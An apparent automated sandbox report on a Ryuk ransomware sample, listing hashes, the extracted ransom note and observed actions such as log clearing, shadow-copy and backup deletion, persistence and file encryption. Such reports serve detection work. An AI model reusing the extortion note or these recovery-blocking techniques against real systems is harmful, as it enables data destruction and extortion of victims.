ryuk | 69e0e73ae659477a01cbc4a7e9720a85daa1e690718449a9f8927b76d755cf93

Analysis

max time kernel
150s
max time network
126s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
11-03-2023 01:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
Size

885KB
MD5

6a5bf25ff4f72ebca91280ffda057260
SHA1

722063331acdbfc93ccbfacbec045800a835dd9e
SHA256

0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09
SHA512

64d6f8fe84882bb5b835388461e2f662d58b8b69ca6314869e4e4bd29496f4ae2d2bda5afa82cbfc6a29d563368343da1b19431fc24ec5261618a424543bce42
SSDEEP

12288:Qm+PiUwyM02Jl5YqWYgeWYg955/155/0QebUlAAsrsKCQoZRn6X:Q5iUtklagQKUKRrsKCQON6

Score

10^/10

ryuk discovery evasion ransomware

Malware Config

Extracted

Path

C:\ProgramData\RyukReadMe.txt

Ransom Note

Your network has been penetrated. All files on each host in the network have been encrypted with a strong algorithm. Backups were either encrypted Shadow copies also removed, so F8 or any other methods may damage encrypted data but not recover. We exclusively have decryption software for your situation. More than a year ago, world experts recognized the impossibility of deciphering by any means except the original decoder. No decryption software is available in the public. Antiviruse companies, researchers, IT specialists, and no other persons cant help you decrypt the data. DO NOT RESET OR SHUTDOWN - files may be damaged. DO NOT DELETE readme files. To confirm our honest intentions.Send 2 different random files and you will get it decrypted. It can be from different computers on your network to be sure that one key decrypts everything. 2 files we unlock for free To get info (decrypt your files) contact us at [email protected] or [email protected] You will receive btc address for payment in the reply letter Ryuk No system is safe

Emails

[email protected]

Signatures

Ryuk
Ransomware distributed via existing botnets, often Trickbot or Emotet.
ransomware ryuk

Clears Windows event logs 1 TTPs 64 IoCs

evasion ransomware

Indicator Removal on Host

T1070

pid	Process
3416	wevtutil.exe
2980	wevtutil.exe
3872	wevtutil.exe
3756	wevtutil.exe
3832	wevtutil.exe
4164	wevtutil.exe
2704	wevtutil.exe
3808	wevtutil.exe
784	wevtutil.exe
3404	wevtutil.exe
1208	wevtutil.exe
4132	wevtutil.exe
2752	wevtutil.exe
2332	wevtutil.exe
4428	wevtutil.exe
4340	wevtutil.exe
3248	wevtutil.exe
1432	wevtutil.exe
3088	wevtutil.exe
4856	wevtutil.exe
2976	wevtutil.exe
5036	wevtutil.exe
280	wevtutil.exe
5104	wevtutil.exe
4952	wevtutil.exe
2084	wevtutil.exe
4724	wevtutil.exe
3668	wevtutil.exe
1300	wevtutil.exe
3828	wevtutil.exe
2300	wevtutil.exe
4808	wevtutil.exe
4972	wevtutil.exe
4104	wevtutil.exe
1312	wevtutil.exe
4356	wevtutil.exe
3840	wevtutil.exe
4988	wevtutil.exe
4672	wevtutil.exe
1392	wevtutil.exe
856	wevtutil.exe
2904	wevtutil.exe
4632	wevtutil.exe
212	wevtutil.exe
3948	wevtutil.exe
1424	wevtutil.exe
4468	wevtutil.exe
4628	wevtutil.exe
4444	wevtutil.exe
4008	wevtutil.exe
4076	wevtutil.exe
3436	wevtutil.exe
4888	wevtutil.exe
3596	wevtutil.exe
2084	wevtutil.exe
2132	wevtutil.exe
224	wevtutil.exe
2368	wevtutil.exe
3832	wevtutil.exe
4416	wevtutil.exe
4764	wevtutil.exe
3064	wevtutil.exe
2128	wevtutil.exe
1584	wevtutil.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
4340	bcdedit.exe
1748	bcdedit.exe

Deletes backup catalog 3 TTPs 1 IoCs

Uses wbadmin.exe to inhibit system recovery.

ransomware

Command-Line Interface

T1059

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
4764	wbadmin.exe

Disables Task Manager via registry modification
evasion
Disables taskbar notifications via registry modification
evasion
Disables use of System Restore points 1 TTPs
evasion

Inhibit System Recovery
T1490

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation	cmd.exe

Drops startup file 3 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe	attrib.exe

Modifies file permissions 1 TTPs 1 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
2888	icacls.exe

Enumerates connected drives 3 TTPs 42 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\O:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened (read-only)	\??\S:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened (read-only)	\??\X:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened (read-only)	\??\f:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\F:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened (read-only)	\??\B:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened (read-only)	\??\R:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened (read-only)	\??\Y:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened (read-only)	\??\K:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\W:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened (read-only)	\??\N:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened (read-only)	\??\V:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened (read-only)	\??\J:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened (read-only)	\??\Z:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\f:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\U:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened (read-only)	\??\A:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened (read-only)	\??\P:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\G:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened (read-only)	\??\M:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened (read-only)	\??\Q:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened (read-only)	\??\T:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\E:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened (read-only)	\??\I:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened (read-only)	\??\L:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\H:	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\META-INF\MANIFEST.MF.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogo.scale-140.png.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\sendforcomments.svg.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\hu-hu\ui-strings.js.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\zh-cn\ui-strings.js.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\es\LC_MESSAGES\vlc.mo.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\fr-ma\ui-strings.js.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\de-de\ui-strings.js.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\delete.svg.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\fi-fi\ui-strings.js.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account-select\css\main.css.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\s_close_h2x.png.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\en-gb\ui-strings.js.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.databinding_1.4.2.v20140729-1044.jar.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-openide-io.jar.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\MondoVL_MAK-ul-oob.xrm-ms.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ca-es\ui-strings.js.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\tool-search-2x.png.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_extended.xml.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files\Microsoft Office\root\rsod\proofing.msi.16.en-us.tree.dat.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Edit_R_Full.aapp.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\de-de\ui-strings.js.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\themes\dark\rhp_world_icon_hover.png.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.attributeTransformation.exsd.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\MondoVL_MAK-ppd.xrm-ms.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ru-ru\ui-strings.js.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AGMGPUOptIn.ini.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_checkbox_selected_18.svg.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\MSFT_PackageManagement\ja-JP\MSFT_PackageManagement.strings.psd1.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.apache.commons.codec_1.6.0.v201305230611.jar.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\ADAL.DLL.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\cy.pak.DATA.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\fa.pak.DATA.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\sr-Cyrl-BA.pak.DATA.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\fi-fi\ui-strings.js.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rcp.intro_5.5.0.165303.jar.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-core-ui.xml.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProfessionalPipcR_Grace-ppd.xrm-ms.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1036\MSO.ACL.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\BLENDS\BLENDS.ELM.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\rjmx.jar.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\AddressBook2x.png.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\ca-es\ui-strings.js.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\FPA_f3\FA000000003.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\uk-ua\ui-strings.js.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-modules-print.xml.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\MondoR_Trial-ppd.xrm-ms.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pdf-ownership-rdr-ja_jp.gif.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\en-ae\ui-strings.js.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\lib\jfxswt.jar.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_export_18.svg.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\redact_poster.jpg.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.attach_5.5.0.165303.jar.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.resources_3.9.1.v20140825-1431.jar.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sv-se\ui-strings.js.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusDemoR_BypassTrial365-ul-oob.xrm-ms.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\s_filetype_psd.svg.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\da-dk\ui-strings.js.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\MANIFEST.MF.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\bg_pattern_RHP.png.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\sl-si\ui-strings.js.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\th.pak.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\zh-cn\ui-strings.js.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\scan.png.[[email protected]].RYK	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe

Drops file in Windows directory 5 IoCs

description	ioc	Process
File created	C:\Windows\RyukReadMe.txt	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File created	C:\Windows\hrmlog1	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.3.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.2.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.1.etl	wbadmin.exe

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4548	sc.exe
2300	sc.exe
2524	sc.exe
4076	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 4 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
4932	schtasks.exe
612	schtasks.exe
1300	schtasks.exe
4836	schtasks.exe

Interacts with shadow copies 2 TTPs 15 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
2828	vssadmin.exe
2388	vssadmin.exe
3268	vssadmin.exe
3464	vssadmin.exe
2748	vssadmin.exe
2976	vssadmin.exe
1492	vssadmin.exe
1944	vssadmin.exe
2328	vssadmin.exe
3540	vssadmin.exe
2860	vssadmin.exe
4288	vssadmin.exe
224	vssadmin.exe
2244	vssadmin.exe
4304	vssadmin.exe

Kills process with taskkill 5 IoCs

evasion

pid	Process
1324	taskkill.exe
4708	taskkill.exe
2460	taskkill.exe
3364	taskkill.exe
1600	taskkill.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000_Classes\Local Settings	cmd.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
4880	NOTEPAD.EXE

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
3928	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
